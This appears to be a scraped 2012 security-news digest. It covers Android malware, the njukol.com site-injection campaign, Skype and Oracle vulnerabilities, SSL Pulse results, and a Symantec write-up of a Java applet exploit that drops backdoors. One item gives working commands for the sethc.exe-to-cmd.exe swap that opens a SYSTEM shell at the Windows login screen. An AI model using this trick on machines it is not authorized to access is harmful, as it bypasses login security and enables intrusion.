The number of malicious programs that target Google's Android mobile platform is growing at an alarming rate, according to data from anti-malware company F-Secure.
The number of malicious programs that target Google’s Android mobile platform is growing at an alarming rate, according to data from anti-malware company F-Secure.
Digest powered by RSS Digest
Digest powered by RSS Digest
Digest powered by RSS Digest
First there was Lizamoon… Surprising us with the millions of websites that got injected.
Then came a few others with the recent ones being nikjju.com and hgbyju.com.
Now came njukol…
Although the name is no longer as catchy as Lizamoon, the idea remains the same.
This njukol.com is still pretty fresh out of the oven. The domain was registered last April 28. The funny thing is, the registrant of the domain is still the same with all those previous ones.
On 03/05/12 At 04:31 PM
Digest powered by RSS Digest
A vulnerability in Skype that could expose members' IP addresses may have been known to Skype officials as far back as November 2010. A researcher who first discovered the flaw speculates it may have been left exposed perhaps because it was deeply embedded in the code and could cause other problems, according to a Wall Street Journal blog.
Digest powered by RSS Digest
Oracle has declined to patch a critical vulnerability in its flagship database product, leaving customers vulnerable to attacks that siphon confidential information from corporate servers and execute malware on backend systems, a security researcher said.
Virtually all versions of the Oracle Database Server released in the past 13 years contain a bug that allows hackers to perform man-in-the-middle attacks that monitor all data passing between the server and end users who are connected to it. That’s what Joxean Koret, a security researcher based in Spain, told Ars. The “Oracle TNS Poison” vulnerability, as he has dubbed it, resides in the Transparent Network Substrate Listener, which routes connections between clients and the database server. Koret said Oracle learned of the bug in 2008 and indicated in a recent e-mail that it had no plans to fix current supported versions of the enterprise product because of concerns it could cause “regressions” in the code base.
Read the comments on this post
You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files.
make a copy somewhere of the original on system sethc.exe
copy c:\windows\system32\sethc.exe c:\
cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe
copy cmd.exe into sethc.exe’s place
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
or
cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe
Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing
it would probably be nice to sethc.exe back when you are done.
Digest powered by RSS Digest
Less than 10 percent of the most popular websites offering Secure Socket Layer protection are hardened against known attacks that could allow hackers to decrypt or tamper with encrypted traffic, researchers said Thursday.
The grim figure was generated by SSL Pulse, a website that monitors the effectiveness of the 200,000 most popular websites that use SSL, also known as Transport Layer Security, to protect e-mail and other sensitive data from being snooped on while in transit. The product of a group of SSL experts from Google, Twitter, PayPal, Qualys and other firms, SSL Pulse systematically scans all subdomains of the top-ranked sites as measured by Alexa for pages that use the protocol to prevent man-in-the-middle eavesdropping. By examining the top 200,000 SSL-enabled sites, the researchers aim to give a snapshot of the overall health of SSL protection, which is offered by an estimated 1.5 million sites in total.
Read the comments on this post
Digest powered by RSS Digest
Digest powered by RSS Digest
Symantec Security Response, along with some other security vendors, reported the discovery of the OSX.Flashback malware recently patched by Apple. Many people may be surprised to learn the infection volume is reported at over 600,000 computers.
On a new front, we have recently identified new Java Applet malware, which uses the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507) to download its payload. This attack vector is the same as the older one, but in this case the Java Applet checks which OS it is running on and downloads a suitable malware for the OS. This is explained further in the following illustration:
When a victim loads the Java Applet malware, it breaks the Java Applet sandbox by using the CVE-2012-0507 vulnerability. This vulnerability is effective for both Mac and Windows operating systems. Then, if the threat is running on a Mac operating system, it downloads a dropper type malware written in Python. However, if the threat is running on a Windows operating system, it downloads a standard Windows executable file dropper. Both droppers drop a Trojan horse program that opens a back door on the compromised computer.
The following Java code illustrates how the Java Applet malware checks which OS it is running on, downloads the dropper, and executes it:
The Trojan only checks whether it is a Windows operating system or not in this code, but the downloaded Python dropper checks again whether it is a Mac operating system or not. If it is running on Linux or some other operating system, the threat does nothing. Python is not a popular script to write malware in, but it works fine on a Mac operating system because Python has already been installed by default.
Finally, one of two back door Trojans is dropped on to the computer. These two Trojans are downloaded from the same server, but are a little bit different from each other.
The back door Trojan for the Mac operating system written in Python can control the “polling times”, which is related to how many times it gets commands from the server at certain time intervals. The author has done this in order to avoid IDS or IPS detection by reducing network communication. The network connection is also encrypted by RC4 or compressed by Zlib.
Currently, the main function is only to get a Python script and execute it. The threat also has the following functions, but these are currently disabled:
On the other hand, the back door Trojan for the Windows operating system is written in C++. This Trojan sends the following information back to the remote attacker:
The Trojan may also download a file and execute it, or open a shell to receive commands.
Recently, malware that targets Mac computers, such as OSX.Flashback and OSX.Sabpab, are increasing. This recent increase provides evidence that malware authors now consider Mac computers a viable battleground along with the Windows platform. Certainly it is now time for you to arm your Mac computer with a good security product.
Symantec detects the Java Applet malware as Trojan.Maljava, the droppers as Trojan.Dropper, and the back door Trojans as Backdoor.Trojan. We continue to watch out for both Mac and Windows malware in order to protect our customers.
To stay safe, please ensure that you have the latest patches installed on your system and keep your antivirus definitions up to date.
Digest powered by RSS Digest
Google Drive is poised to give IT departments yet another headache to deal with.
Drive, the name of Google’s data-syncing cloud storage service that’s rumored to launch sometime next week, will likely offer many of the features of popular storage apps such as Dropbox and Box, including 5GB of free storage with upgrades of up to 100GB of storage for users willing to pay for service.
Digest powered by RSS Digest
